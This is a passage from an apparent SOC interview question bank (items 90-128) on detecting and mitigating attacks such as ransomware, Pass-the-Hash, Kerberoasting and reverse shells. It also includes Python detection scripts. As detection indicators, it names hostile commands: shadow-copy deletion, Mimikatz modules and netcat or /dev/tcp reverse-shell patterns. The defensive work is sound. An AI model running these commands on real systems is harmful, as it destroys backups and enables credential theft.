Look for processes that do not normally speak HTTP/S (Office applications, signed but unusual binaries) making outbound C2 connections.
Mitigation:
Load published Brute Ratel detection signatures and YARA rules into EDR/XDR.
Use Threat Intelligence feeds to block known C2 infrastructure.

90. How do you detect an LLMNR/NBT-NS Poisoning attack?

Answer:
When a Windows host fails DNS resolution, it falls back to LLMNR and NBT-NS broadcasts; an attacker running Responder answers those broadcasts, poses as the requested host, and captures NTLMv2 challenge/response hashes for cracking or relaying.
Detection:
Look for a single host answering many LLMNR (UDP 5355) or NBT-NS (UDP 137) queries in Wireshark or IDS logs; legitimate hosts only answer for their own name.
Run a detection honeypot that periodically queries a nonexistent name and alerts when anything answers.
On DCs, NTLM auditing (Microsoft-Windows-NTLM/Operational, Event ID 8004) shows the NTLM authentications that result when captured hashes are relayed.
Mitigation:
Disable LLMNR (Group Policy: Turn off multicast name resolution) and NetBIOS over TCP/IP.
Enforce SMB Signing and restrict NTLM to NTLMv2 only, or block NTLM entirely where possible.

91. How do you detect an OAuth Phishing attack?

Answer:
Attackers register a malicious application and trick users into granting it OAuth permissions (for example Mail.Read, offline_access), giving the attacker API access that survives password resets and bypasses MFA.
Detection:
Monitor Microsoft 365 / Entra ID audit logs for "Consent to application" events and for new third-party apps with broad delegated permissions.
Use the SIEM to alert on consent grants from untrusted locations or to applications with generic names and recently created publishers.
Mitigation:
Configure user consent settings so users cannot consent to unverified apps, and route requests through the admin consent workflow.
Restrict OAuth to approved applications only and periodically review existing grants.

92. How do you investigate a SIM Swapping attack?

Answer:
Attackers socially engineer or bribe the carrier into porting the victim's phone number to a SIM they control, so SMS and voice 2FA codes are delivered to them.
Detection:
Look for sudden changes to 2FA delivery methods or registered phone numbers, followed shortly by password resets.
Monitor for multiple failed 2FA attempts followed by a success from a new device or location.
Mitigation:
Use hardware-based, phishing-resistant authentication (YubiKey, FIDO2) instead of SMS for privileged and high-value accounts.
Enable carrier PINs and port-freeze protections for SIM cards.

93. What is Magecart, and how do you detect it?

Answer:
Magecart is the collective name for web-skimming attacks in which JavaScript injected into an e-commerce checkout page copies payment card data to an attacker-controlled domain as the customer types it.
Detection:
Monitor for unauthorized changes to JavaScript on checkout pages and in the third-party scripts they load (tag managers, analytics).
Look for unusual external domains in the page's network requests, especially POSTs fired from the payment form.
Mitigation:
Implement Subresource Integrity (SRI) hashes for third-party JavaScript and a Content Security Policy that limits script-src and connect-src to known domains.
Regularly scan rendered payment pages for unauthorized script injections (PCI DSS 4.0 requirements 6.4.3 and 11.6.1).

94. What is a Living-Off-the-Land (LotL) attack, and how do you detect it?

Answer:
Attackers use signed, built-in system tools (LOLBins) such as rundll32.exe, regsvr32.exe, wmic.exe, certutil.exe, mshta.exe or powershell.exe to download, execute and persist, so no malicious binary has to be introduced.
Detection:
Monitor for unusual parent-child process relationships (winword.exe spawning powershell.exe, or rundll32.exe with no command-line arguments making network connections).
Check for PowerShell execution with encoded commands and for certutil or mshta fetching remote URLs.
Mitigation:
Restrict execution of unsigned PowerShell scripts and enable script block logging.
Enable Defender attack surface reduction (ASR) rules and application control (WDAC/AppLocker) to block LOLBins that users do not need.

95. How do you detect a Business Email Compromise (BEC) attack?

Answer:
Attackers spoof or compromise executive or vendor email accounts to request fund transfers or changes to payment details.
Detection:
Look for sudden changes in mailbox forwarding or inbox rules, especially rules that hide or delete replies.
Monitor for login attempts from unexpected locations and for sending activity from unfamiliar clients.
Mitigation:
Implement SPF, DKIM and DMARC (with a reject policy) to stop exact-domain spoofing.
Require multi-factor authentication (MFA) for all email accounts and out-of-band verification for payment changes.

96. What is Mimikatz and how do you detect it?

Answer:
Mimikatz is an open-source tool that extracts plaintext passwords, NTLM hashes and Kerberos tickets from LSASS memory and performs follow-on attacks such as Pass-the-Hash, Golden Ticket and DCSync.
Detection:
Look for Sysmon Event ID 10 (ProcessAccess) targeting lsass.exe from unexpected source processes, with access masks such as 0x1010 or 0x1410.
Monitor command lines and script block logs for module names like sekurlsa::logonpasswords, lsadump::dcsync or kerberos::golden; catch renamed binaries by checking the OriginalFileName field in Sysmon Event ID 1.
Mitigation:
Enable Credential Guard so credentials are isolated from LSASS memory.
Run LSASS as a protected process (RunAsPPL registry setting) and restrict local admin rights.

97. How do you detect a Ransomware attack in progress?

Answer:
Detection:
Look for mass file renames or modifications where a single process writes files with a new, unknown extension at a high rate.
Monitor Event ID 4663 (object access) on file shares with SACLs, or EDR file telemetry, for bursts of writes across many directories.
Detect processes deleting Shadow Copies or disabling recovery (vssadmin delete shadows, wmic shadowcopy delete, bcdedit /set recoveryenabled no).
Watch for ransom-note files created in every directory and for service or AV tampering just before encryption starts.
Mitigation:
Enable ransomware protection / controlled folder access in Windows Defender and ASR rules.
Implement offline backups and immutable storage, and test restores.
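
The two detections above, written out as an added example (not part of the original document or of any vendor's product). The event shapes are simplified from Sysmon process-creation (Event ID 1) and EDR file-rename telemetry; all sample events, PIDs and paths are constructed for this illustration.

```python
# Added example: ransomware-in-progress checks over endpoint telemetry.
# Sample data below is constructed; field names are simplified from Sysmon/EDR events.
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Command-line patterns for recovery inhibition (MITRE ATT&CK T1490).
RECOVERY_INHIBITION = [
    ("shadow copy deletion (vssadmin)", re.compile(r"\bvssadmin(\.exe)?\b.*\bdelete\s+shadows", re.I)),
    ("shadow copy deletion (wmic)", re.compile(r"\bwmic(\.exe)?\b.*\bshadowcopy\b.*\bdelete", re.I)),
    ("shadow storage shrink (vssadmin)", re.compile(r"\bvssadmin(\.exe)?\b.*\bresize\s+shadowstorage", re.I)),
    ("recovery disabled (bcdedit)", re.compile(r"\bbcdedit(\.exe)?\b.*\brecoveryenabled\s+no", re.I)),
    ("backup catalog deleted (wbadmin)", re.compile(r"\bwbadmin(\.exe)?\b.*\bdelete\s+catalog", re.I)),
]

PROCESS_EVENTS = [  # constructed: children of the suspected ransomware process (pid 4412)
    {"time": "2024-03-01T02:14:00", "pid": 4500, "parent_pid": 4412,
     "image": r"C:\Windows\System32\vssadmin.exe", "cmdline": "vssadmin.exe delete shadows /all /quiet"},
    {"time": "2024-03-01T02:14:01", "pid": 4501, "parent_pid": 4412,
     "image": r"C:\Windows\System32\bcdedit.exe", "cmdline": "bcdedit /set {default} recoveryenabled no"},
    {"time": "2024-03-01T02:14:02", "pid": 4502, "parent_pid": 900,   # benign admin query
     "image": r"C:\Windows\System32\vssadmin.exe", "cmdline": "vssadmin.exe list shadows"},
]

FILE_EVENTS = [  # constructed: (time, pid, old_path, new_path)
    ("2024-03-01T02:14:03", 4412, r"C:\Users\alice\Documents\Q1.xlsx", r"C:\Users\alice\Documents\Q1.xlsx.lockd"),
    ("2024-03-01T02:14:03", 4412, r"C:\Users\alice\Documents\board.pptx", r"C:\Users\alice\Documents\board.pptx.lockd"),
    ("2024-03-01T02:14:04", 4412, r"C:\Users\alice\Pictures\team.jpg", r"C:\Users\alice\Pictures\team.jpg.lockd"),
    ("2024-03-01T02:14:05", 4412, r"\\FS01\finance\ledger.xlsx", r"\\FS01\finance\ledger.xlsx.lockd"),
    ("2024-03-01T02:14:06", 4412, r"\\FS01\finance\payroll.csv", r"\\FS01\finance\payroll.csv.lockd"),
    ("2024-03-01T02:14:08", 4412, r"\\FS01\hr\contracts.pdf", r"\\FS01\hr\contracts.pdf.lockd"),
    ("2024-03-01T02:14:10", 1200, r"C:\Users\alice\Documents\~WRL0001.tmp", r"C:\Users\alice\Documents\memo.docx"),
]


def recovery_inhibition(process_events):
    """(pid, parent_pid, label) for every process whose command line matches a T1490 pattern."""
    hits = []
    for ev in process_events:
        for label, pattern in RECOVERY_INHIBITION:
            if pattern.search(ev["cmdline"]):
                hits.append((ev["pid"], ev["parent_pid"], label))
                break
    return hits


def new_extension(path):
    """Lower-cased final extension of a Windows or UNC path, or '' if there is none."""
    name = path.rsplit("\\", 1)[-1]
    return name[name.rfind("."):].lower() if "." in name else ""


def mass_rename(file_events, threshold=5, window=timedelta(seconds=30)):
    """{pid: extension} for processes that changed >= threshold files to one new extension in a window."""
    by_pid = defaultdict(list)
    for t, pid, old, new in file_events:
        ext = new_extension(new)
        if ext and ext != new_extension(old):          # only extension changes count
            by_pid[pid].append((datetime.fromisoformat(t), ext))
    alerts = {}
    for pid, renames in by_pid.items():
        renames.sort()
        for i, (start, ext) in enumerate(renames):
            n = sum(1 for t, e in renames[i:] if e == ext and t - start <= window)
            if n >= threshold:
                alerts[pid] = ext
                break
    return alerts


def parents_of_interest(process_events, file_events):
    """Cross-check: PIDs that both spawned recovery-inhibition commands and mass-renamed files."""
    renamers = set(mass_rename(file_events))
    return sorted({ppid for _, ppid, _ in recovery_inhibition(process_events) if ppid in renamers})
```

Either signal alone produces false positives (backup jobs shrink shadow storage; batch converters rename many files), so the cross-check in parents_of_interest is what should page someone: one process that both disables recovery and encrypts is very unlikely to be legitimate.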

98. How do you detect a Malicious Insider in your organization?

Answer:
Detection:
Look for large amounts of data copied to USB devices or uploaded to personal cloud storage.
Detect high file access rates outside normal working hours or against data the user's role does not require.
Monitor for unauthorized access to financial or HR systems and for spikes in activity shortly before a resignation.
Mitigation:
Use DLP (Data Loss Prevention) solutions.
Implement least-privilege access and zero-trust security policies, and review access rights when roles change.

99. What is an NTLM Relay Attack, and how do you prevent it?

Answer:
Attackers who can coerce or intercept a victim's NTLM authentication (via LLMNR poisoning, PetitPotam-style coercion or a malicious link) forward the challenge/response to another server and are authenticated there as the victim, without cracking the hash.
Detection:
Look for unexpected SMB or LDAP authentication on servers from a workstation the account does not normally use.
Monitor Event ID 4776 (NTLM credential validation) on DCs and compare its Source Workstation field with the IP address in the matching 4624; a relay shows the victim's workstation name arriving from the attacker's IP.
Mitigation:
Disable NTLM authentication where possible, or restrict it with NTLM auditing and block policies.
Enforce SMB Signing, LDAP Signing and LDAP Channel Binding, and Extended Protection for Authentication on web services such as AD CS enrollment.

100. What are some key KPIs for a SOC team?

Answer:
Mean Time to Detect (MTTD) – How fast threats are identified after they occur.
Mean Time to Respond (MTTR) – How quickly incidents are contained once detected.
False Positive Rate – Percentage of alerts that turn out to be benign.
Dwell Time – How long attackers remain in the environment undetected.
Threat Coverage – Percentage of relevant MITRE ATT&CK techniques with working detections.

101. How do you detect a Pass-the-Hash (PtH) attack?

Answer:
Pass-the-Hash lets an attacker who has stolen an account's NTLM hash authenticate over NTLM without knowing the plaintext password.
Detection:
On the target: Event ID 4624 with Logon Type 3, Logon Process NtLmSsp, Authentication Package NTLM and Key Length 0 (no session key negotiated), excluding ANONYMOUS LOGON.
On the source: Event ID 4624 with Logon Type 9 (NewCredentials) and Logon Process seclogo, the footprint of sekurlsa::pth (runas /netonly produces the same event, so baseline it).
NTLM logons by accounts that otherwise always use Kerberos, especially to many hosts in a short time.
Mitigation:
Use Windows Defender Credential Guard and LSA protection to make hash theft harder.
Restrict NTLM, add privileged accounts to the Protected Users group, and use LAPS so each machine's local admin hash is unique.
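
The two 4624 footprints above, turned into a check and correlated by account, as an added example (not part of the original document). Field names mirror the Security 4624 event data; the sample events, hostnames and addresses are constructed for this illustration.

```python
# Added example: Pass-the-Hash indicators in Windows Security 4624 events.
# The events below are constructed; field names follow the 4624 EventData schema.

SAMPLE_4624 = [
    # Ordinary Kerberos network logon to a file server: no hit.
    {"EventID": 4624, "Computer": "FS01", "LogonType": 3, "TargetUserName": "alice",
     "TargetDomainName": "CORP", "LogonProcessName": "Kerberos",
     "AuthenticationPackageName": "Kerberos", "KeyLength": 0, "IpAddress": "10.0.5.20"},
    # Ordinary NTLM logon from a non-domain device negotiates a 128-bit session key: no hit.
    {"EventID": 4624, "Computer": "FS01", "LogonType": 3, "TargetUserName": "scanner",
     "TargetDomainName": "FS01", "LogonProcessName": "NtLmSsp",
     "AuthenticationPackageName": "NTLM", "KeyLength": 128, "IpAddress": "10.0.7.3"},
    # NTLM network logon with Key Length 0 on the target: classic PtH footprint.
    {"EventID": 4624, "Computer": "FS01", "LogonType": 3, "TargetUserName": "svc_backup",
     "TargetDomainName": "CORP", "LogonProcessName": "NtLmSsp",
     "AuthenticationPackageName": "NTLM", "KeyLength": 0, "IpAddress": "10.0.9.77"},
    # Anonymous SMB session setup also shows Key Length 0 and must be excluded.
    {"EventID": 4624, "Computer": "FS01", "LogonType": 3, "TargetUserName": "ANONYMOUS LOGON",
     "TargetDomainName": "NT AUTHORITY", "LogonProcessName": "NtLmSsp",
     "AuthenticationPackageName": "NTLM", "KeyLength": 0, "IpAddress": "10.0.7.3"},
    # NewCredentials logon via seclogo on the source host: sekurlsa::pth (or runas /netonly).
    {"EventID": 4624, "Computer": "WS042", "LogonType": 9, "TargetUserName": "svc_backup",
     "TargetDomainName": "CORP", "LogonProcessName": "seclogo",
     "AuthenticationPackageName": "Negotiate", "KeyLength": 0, "IpAddress": "::1"},
]


def is_pth_target_indicator(ev):
    """4624 on the *target*: NTLM network logon that negotiated no session key."""
    return (ev.get("EventID") == 4624 and ev.get("LogonType") == 3
            and ev.get("LogonProcessName") == "NtLmSsp"
            and ev.get("AuthenticationPackageName") == "NTLM"
            and ev.get("KeyLength") == 0
            and ev.get("TargetUserName", "").upper() != "ANONYMOUS LOGON")


def is_pth_source_indicator(ev):
    """4624 on the *source*: NewCredentials (type 9) logon through seclogo."""
    return (ev.get("EventID") == 4624 and ev.get("LogonType") == 9
            and ev.get("LogonProcessName") == "seclogo"
            and ev.get("AuthenticationPackageName") == "Negotiate")


def find_pth_candidates(events):
    """(indicator, computer, account, ip) for every event matching either footprint."""
    hits = []
    for ev in events:
        if is_pth_target_indicator(ev):
            hits.append(("target_ntlm_no_session_key", ev["Computer"], ev["TargetUserName"], ev["IpAddress"]))
        elif is_pth_source_indicator(ev):
            hits.append(("source_seclogo_newcredentials", ev["Computer"], ev["TargetUserName"], ev["IpAddress"]))
    return hits


def correlated_accounts(events):
    """Accounts seen in a seclogo logon on one host AND an NTLM/KeyLength-0 logon on another."""
    hits = find_pth_candidates(events)
    sources = {user for kind, _, user, _ in hits if kind.startswith("source")}
    targets = {user for kind, _, user, _ in hits if kind.startswith("target")}
    return sorted(sources & targets)
```

Each indicator on its own is noisy (legacy devices use NTLM, admins use runas /netonly); an account that appears in both sets within a few minutes is the alert worth raising.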

102. What is a Golden SAML attack, and how do you detect it?

Answer:
Attackers who steal the ADFS token-signing certificate (and its private key) forge SAML assertions for any user, including claims that MFA was already satisfied, and use them to access federated cloud services such as Microsoft 365.
Detection:
Compare cloud sign-ins with ADFS logs: a SAML token accepted by the cloud provider with no corresponding ADFS token-issuance event (Event ID 1200/1202) is forged.
Look for SAML assertions with unusual issuer, lifetime or claim values, and for cloud logins without MFA challenges by accounts that require MFA.
Alert on export of the token-signing certificate from ADFS (ADFS Event ID 307 configuration changes, reads of the DKM key container in AD).
Mitigation:
Rotate the ADFS token-signing and decryption certificates after any suspected compromise and treat ADFS servers as Tier 0 assets.
Implement Conditional Access policies and, where possible, migrate from ADFS to cloud-native authentication.

103. How do you detect Domain Fronting?

Answer:
Attackers open a TLS connection whose SNI names a harmless site hosted on a CDN (Cloudflare, Akamai, AWS CloudFront) while the HTTP Host header inside the encrypted stream names their own CDN-hosted C2, so network monitoring sees only the benign domain.
Detection:
With TLS inspection in place, look for mismatches between the TLS SNI field and the HTTP Host header.
Without inspection, baseline CDN traffic per host and alert on beacon-like, long-lived or high-volume sessions to CDN address space from processes that do not normally use those services.
Mitigation:
Use TLS inspection (DPI) to compare SNI and Host and block mismatches; most large CDNs now also reject fronted requests on their side.
Force outbound traffic through an authenticated proxy with URL logging, and block CDNs the organization does not use, bearing in mind that many legitimate sites depend on them.

104. How do you detect a Kerberoasting attack?

Answer:
Any domain user can request a service ticket (TGS) for any SPN; the ticket is encrypted with the service account's key, so attackers request tickets for many SPNs and crack the weak, password-derived RC4 ones offline.
Detection:
Monitor Event ID 4769 with Ticket Encryption Type 0x17 (RC4-HMAC) for service accounts that should be using AES, excluding krbtgt and machine accounts.
Check for one account requesting tickets for many distinct SPNs in a short window, especially SPNs it has never used before.
Mitigation:
Enforce AES-only encryption for service accounts and disable RC4 wherever legacy systems allow it.
Use long random passwords (25+ characters) or gMSAs for service accounts and rotate them frequently.

105. How do you investigate a VPN account takeover?

Answer:
Detection:
Look for VPN logins from multiple geographic locations in a short time (impossible travel).
Detect login attempts using previously breached credentials (credential stuffing) or coming from anonymizing services.
Check for sudden changes in MFA settings, new device enrollments, or internal access patterns after connection that do not match the user's role.
Mitigation:
Enforce geofencing or risk-based access for VPN logins.
Require phishing-resistant, hardware-based MFA (YubiKey, FIDO2) and patch the VPN appliance promptly.

106. What is a Golden Ticket attack, and how do you detect it?

Answer:
Attackers who obtain the krbtgt account's hash (for example via DCSync) forge a Kerberos TGT for any user, with any group membership (typically Domain Admins) and any lifetime, and the DCs will issue service tickets for it.
Detection:
Event ID 4769 (TGS requests) for an account with no preceding Event ID 4768 (TGT request) on any DC, since the forged TGT was never requested.
4624/4769 events whose account name or domain fields are malformed or inconsistent (a non-existent user, a blank domain, or the FQDN instead of the NetBIOS name).
Kerberos tickets in use for longer than the domain's maximum TGT lifetime (10 hours by default).
Mitigation:
Rotate the krbtgt account password twice (allowing replication between the resets) after any DC compromise.
Protect DCs as Tier 0 and monitor for DCSync (Event ID 4662 with directory replication control-access rights requested by non-DC accounts).

107. How do you detect a Reverse Shell attack?

Answer:
A reverse shell is a payload that makes the compromised host connect outbound to the attacker and attach a command interpreter to that connection, which usually passes firewalls that only filter inbound traffic.
Detection:
Look for shell or interpreter processes (cmd.exe, powershell.exe, /bin/sh, bash, python) holding network connections to external IPs, and for shells spawned by processes that should never spawn them (web server workers, database engines).
Monitor for netcat (nc -e), bash -i with /dev/tcp redirection, Python socket-plus-subprocess one-liners, or PowerShell using System.Net.Sockets.TCPClient.
Mitigation:
Block outbound connections to uncommon ports and force egress through a proxy.
Implement application control to prevent unauthorized script execution, and run services with minimal privileges so a shell yields little.

108. What is a Golden GMSA attack?

Answer:
Group Managed Service Account (gMSA) passwords are derived from the domain's KDS root key. An attacker who reads that root key (msKds-ProvRootKey, normally readable only by Domain Admins and DCs) can compute the current and future password of every gMSA offline, which gives durable persistence even though the passwords rotate.
Detection:
Audit reads of the KDS root key objects and of the msDS-ManagedPassword attribute (Event ID 4662) by principals other than the hosts allowed to retrieve each gMSA's password.
Monitor for gMSA credentials dumped from LSASS on the hosts that run them (Mimikatz sekurlsa::logonpasswords exposes the gMSA password).
Mitigation:
Restrict PrincipalsAllowedToRetrieveManagedPassword to the specific hosts or groups that need each gMSA.
Protect DCs and Tier 0 credentials; if the KDS root key is compromised, create a new root key and recreate the affected gMSAs, since existing ones cannot be re-keyed.
Use LSA protection (RunAsPPL) to hinder credential dumping on gMSA hosts.

109. What is a Web Cache Deception attack?

Answer:
An attacker lures a logged-in victim to a URL such as /account/settings/nonexistent.css; the application ignores the bogus suffix and returns the victim's private page, but the CDN or reverse proxy caches it because the path looks like a static asset, and the attacker then fetches the cached copy.
Detection:
Look in cache or CDN logs for cache hits on paths under authenticated areas, or for cached responses containing session tokens, CSRF tokens or personal data.
Monitor for anomalous URL patterns: authenticated endpoints followed by static-looking extensions (.css, .js, .png) that do not exist in the application.
Mitigation:
Send Cache-Control: no-store (and Vary: Cookie) on authentication-related and user-specific endpoints.
Make the application return 404 for unexpected path suffixes, and configure the cache to store a response only when its Content-Type matches the requested extension.

110. How do you detect DNS Tunneling?

Answer:
Attackers encode data into the subdomain labels of queries for a domain whose authoritative server they control (and into the TXT/NULL/CNAME answers coming back), turning DNS into a covert exfiltration or C2 channel that passes most firewalls.
Detection:
Look for DNS requests with unusually long, high-entropy subdomains and a large number of unique subdomains under one parent domain.
Monitor for high-frequency queries to a single domain, an unusual share of TXT or NULL record types, and oversized responses.
Mitigation:
Route all DNS through internal resolvers, block direct outbound port 53 from endpoints, and block signatures of known tunneling tools (iodine, dnscat2).
Implement anomaly detection on resolver logs (statistical or machine-learning based).

111. What is an HTML Smuggling attack, and how do you detect it?

Answer:
Attackers deliver an HTML attachment or link in which JavaScript reassembles an encoded payload on the client (atob(), Blob, URL.createObjectURL or msSaveBlob) and triggers a download, so the malicious file never crosses the network as a file that proxies or mail gateways can scan.
Detection:
Look for HTML attachments or downloaded .html files containing atob(), Blob() or createObjectURL() together with large base64 strings.
Monitor for browser processes writing executables, ISO or ZIP files to the Downloads folder immediately after opening a local HTML file.
Mitigation:
Block or quarantine HTML and HTM attachments in email.
Use browser security policies (Content Security Policy, download restrictions) and block automatic mounting of ISO files.

112. What is a Container Escape attack, and how do you detect it?

Answer:
Attackers break out of a Docker or Kubernetes container onto the host, typically through a privileged container, a mounted Docker socket or host path, excessive capabilities (for example CAP_SYS_ADMIN), or a kernel or runtime vulnerability.
Detection:
Monitor for containerized processes mounting the host filesystem, calling nsenter or setns to join host namespaces, or touching /proc/1/root and /proc/sysrq-trigger.
Look for privileged container launches (--privileged flag, hostPID/hostNetwork, /var/run/docker.sock mounts) and writes to a cgroup release_agent.
Mitigation:
Run containers as non-root with the default seccomp profile and AppArmor/SELinux policies, dropping unneeded capabilities.
Implement runtime security tools such as Falco or Aqua Security and admission controls that reject privileged pods.

113. How do you detect an Evil Twin attack?

Answer:
Attackers set up a rogue Wi-Fi access point with the corporate SSID to capture credentials or intercept traffic.
Detection:
Look for duplicate SSIDs broadcast from BSSIDs (MAC addresses) that are not in the authorized AP inventory.
Monitor for unexpected WPA2-Enterprise authentication attempts, for example RADIUS requests for users who are already connected elsewhere, or clients reporting certificate warnings.
Mitigation:
Use certificate-based authentication for Wi-Fi (EAP-TLS) with clients configured to validate the RADIUS server certificate.
Implement wireless IDS/IPS solutions that detect and contain rogue APs.

114. How do you investigate a Windows Defender exclusion bypass?

Answer:
Attackers with admin rights add path, process or extension exclusions to Windows Defender so their tooling is never scanned.
Detection:
Look for registry modifications under HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions (Paths, Processes, Extensions), and for Add-MpPreference or Set-MpPreference with -Exclusion* parameters in PowerShell logs.
Detect Event ID 5007 (Windows Defender configuration changed) in the Microsoft-Windows-Windows Defender/Operational log.
Mitigation:
Manage Defender settings centrally through Group Policy or Intune and alert on local deviations.
Enable Windows Defender Tamper Protection so local admins cannot change exclusions or disable protection.

115. How do you detect a USB Rubber Ducky attack?

Answer:
A USB Rubber Ducky is a device that presents itself as a keyboard and types a pre-programmed keystroke sequence (for example opening the Run dialog and launching PowerShell) within seconds of being plugged in.
Detection:
Look for new HID (Human Interface Device) keyboard registrations (Event ID 6416, with the Audit PnP Activity policy enabled) followed within seconds by a process launched from explorer.exe.
Detect script or command execution immediately after USB insertion, typed far faster than a human could.
Mitigation:
Disable USB autorun policies and restrict installation of new HID devices by device class or vendor ID via Group Policy.
Use endpoint protection to block unauthorized USB devices and lock workstations when unattended.

116. How do you detect an MFA Fatigue Attack?

Answer:
Attackers who already hold valid credentials spam the victim with continuous MFA push notifications until the victim approves one out of annoyance or confusion.
Detection:
Look for many denied or timed-out MFA push requests for one account within a short time, often at night.
Monitor MFA approvals from unusual locations or times, especially an approval that immediately follows a string of denials.
Mitigation:
Implement MFA number matching and additional context (location, application name) in the prompt to prevent accidental approvals.
Use phishing-resistant authentication like FIDO2 tokens, and lock the account after repeated MFA denials.

117. What is a Shadow IT threat, and how do you detect it?

Answer:
Employees use cloud apps and services that IT has not approved or secured, creating unmanaged data stores and accounts that attackers can target.
Detection:
Monitor unsanctioned SaaS apps in CASB or proxy logs.
Look for data transfers to personal cloud storage (Google Drive, Dropbox) and for corporate email addresses registering with unknown services.
Mitigation:
Enforce Cloud Access Security Broker (CASB) policies and offer sanctioned alternatives for common needs.
Use DLP (Data Loss Prevention) to block unauthorized uploads.

118. How do you detect PowerShell exploitation in an enterprise environment?

Answer:
Attackers use PowerShell for reconnaissance, lateral movement, privilege escalation and in-memory payload execution because it is installed everywhere and signed by Microsoft.
Detection:
Monitor PowerShell launches with -EncodedCommand (or its abbreviations -e, -ec, -enc), -NoProfile, -WindowStyle Hidden, or download cradles, and decode the encoded scripts.
Look for suspicious parent-child relationships (winword.exe or wscript.exe spawning powershell.exe; powershell.exe spawning cmd.exe or rundll32.exe).
Enable script block logging (Event ID 4104) and module logging so de-obfuscated scripts reach the SIEM.
Mitigation:
Enable PowerShell Constrained Language Mode and remove PowerShell v2.
Use Windows Defender AMSI (Antimalware Scan Interface) to detect malicious scripts at run time.

119. How do you analyze an infected memory dump?

Answer:
Steps:
1. Load the image in Volatility 3 (Rekall is no longer maintained) and let it identify the OS and symbol tables.
2. List processes (windows.pslist, windows.pstree, windows.psscan) and flag hidden processes, odd parents, or misspelled system binaries.
3. Enumerate network connections (windows.netscan) and tie suspicious remote addresses back to a PID.
4. Inspect injected code (windows.malfind), loaded DLLs (windows.dlllist) and handles, then dump the suspicious process memory (windows.dumpfiles, or windows.memmap with --dump).
5. Hash and analyze the extracted artifacts with YARA, VirusTotal or a sandbox, and pivot on the resulting IOCs across the estate.

120. How do you detect a DNS Rebinding attack?

Answer:
A malicious page is served from a domain whose DNS record first points to the attacker's server and then, with a very short TTL, to a private address; because the browser still treats it as the same origin, the page's JavaScript can now reach internal services (routers, dev servers) that trust the local network.
Detection:
Look for external domains whose answers flip between public and RFC 1918 / loopback addresses with very low TTLs.
Monitor endpoints for browser-initiated requests to private IP ranges right after a visit to an unfamiliar site.
Mitigation:
Configure the internal resolver to drop external answers that resolve to RFC 1918, loopback or link-local addresses (dnsmasq --stop-dns-rebind, Unbound private-address).
Make internal services validate the Host header and require authentication, so a request arriving under an unexpected hostname is rejected.

121. How do you detect an SSRF (Server-Side Request Forgery) attack?

Answer:
Attackers supply a URL or hostname to a feature that fetches it server-side (webhooks, image import, PDF rendering), making the server send requests to internal resources it can reach but the attacker cannot.
Detection:
Look for application requests to 169.254.169.254 (the AWS, Azure and GCP instance metadata address), to RFC 1918 addresses, or over unusual schemes (file://, gopher://) in web and egress logs.
Monitor internal requests originating from public-facing application servers and correlate them with user-supplied URL parameters in the access logs.
Mitigation:
Validate user-supplied URLs against an allowlist of hosts, resolve the hostname and reject private, loopback and link-local addresses before connecting, and do not follow redirects blindly.
Apply egress filtering so application servers reach only the destinations they need, and require IMDSv2 on AWS (session token with a hop limit) so a plain GET cannot read instance credentials.

122. How do you investigate an LLMNR/NBT-NS poisoning attack?

Answer:
Attackers answer Windows fallback name-resolution broadcasts so that victims authenticate to them, yielding NTLMv2 hashes to crack or relay.
Detection:
Look for sudden spikes in LLMNR/NBT-NS traffic (UDP 5355, UDP 137) and for one IP answering queries for many different names.
Identify the responding host from the captured answers and examine it for Responder (responder.py) or similar tooling; it is usually a compromised workstation or a device planted on the network.
Mitigation:
Disable LLMNR and NBT-NS via Group Policy and DHCP options.
Enforce SMB signing and NTLM relay protections (LDAP signing, channel binding, EPA).

123. How do you investigate an attack on AWS S3 buckets?

Answer:
Detection:
Review CloudTrail for bucket-policy and ACL changes (PutBucketPolicy, PutBucketAcl, PutObjectAcl, removal of Block Public Access settings) and for ListBuckets/ListObjects calls from unfamiliar principals or IPs; enable S3 data events to see GetObject and PutObject activity.
Monitor for buckets becoming publicly accessible (AWS Config rule s3-bucket-public-read-prohibited, Security Hub findings) and for sudden spikes in GetObject volume that indicate bulk download.
Mitigation:
Enable S3 Block Public Access at the account level and enforce bucket policies that deny public or unencrypted access.
Enable Amazon Macie for sensitive-data discovery and GuardDuty S3 protection for anomaly detection.

124. How do you detect an NTLM Relay Attack?

Answer:
Attackers relay a captured NTLM authentication in real time to a target SMB, LDAP or HTTP service, gaining the victim's access there without cracking the hash.
Detection:
Look for SMB or LDAP authentications where the account's usual workstation name appears with an IP address that belongs to a different host.
Monitor Event ID 4624 (Logon Type 3, NTLM) on servers, and 4776 on DCs, for the same account authenticating from two hosts within seconds.
Mitigation:
Enforce SMB signing, LDAP signing and channel binding, and Extended Protection for Authentication (EPA) on HTTP endpoints such as AD CS web enrollment.
Block or audit NTLM over LDAP and move to Kerberos wherever possible.

125. What is BEC (Business Email Compromise), and how do you detect it?

Answer:
Attackers impersonate executives or suppliers, through spoofing, look-alike domains or a compromised mailbox, to trick employees into making fraudulent payments or changing bank details.
Detection:
Look for email header anomalies (a Reply-To address different from the From address, a display name matching an executive but an external sender domain, or a newly registered look-alike domain).
Monitor for keywords like "urgent," "payment," or "wire transfer" combined with first-time senders or requests to bypass the normal process.
Mitigation:
Enforce DMARC, DKIM and SPF to block spoofed emails, and tag external mail.
Implement user training, phishing simulations and a mandatory out-of-band callback for payment changes.

126. How do you detect a BadUSB attack?

Answer:
Attackers reprogram a USB device's firmware so it enumerates as a keyboard (injecting keystrokes) or as a network adapter (hijacking DNS or DHCP) while looking like an ordinary storage device.
Detection:
Look for new HID devices registered as keyboards, or new network adapters, in Event ID 6416 (requires the Audit PnP Activity policy).
Detect sudden script execution, or a new default route or DNS server, immediately after USB insertion.
Mitigation:
Disable USB autorun policies and block installation of new device classes via Group Policy.
Use USB allowlisting (by vendor and product ID) and endpoint protection.

127. How do you investigate an Azure AD brute-force attack?

Answer:
Detection:
Look in the Azure AD (Microsoft Entra ID) Sign-in logs for many failed attempts (error code 50126, invalid username or password) against one or many accounts from the same IP or ASN; password spraying shows one or two attempts per account across many accounts.
Monitor for a success following the failures, and for logins that bypass MFA via legacy authentication protocols (IMAP, SMTP AUTH).
Mitigation:
Implement Conditional Access Policies, including blocking legacy authentication, and enable Smart Lockout.
Use Azure Identity Protection (Entra ID Protection) to detect risky sign-ins and force a password reset or MFA.

128. What is a Kubernetes RBAC attack, and how do you detect it?

Answer:
Attackers abuse overly permissive Kubernetes Role-Based Access Control (RBAC), usually via a service account token taken from a compromised pod, to read secrets, create privileged pods, or grant themselves cluster-admin.
Detection:
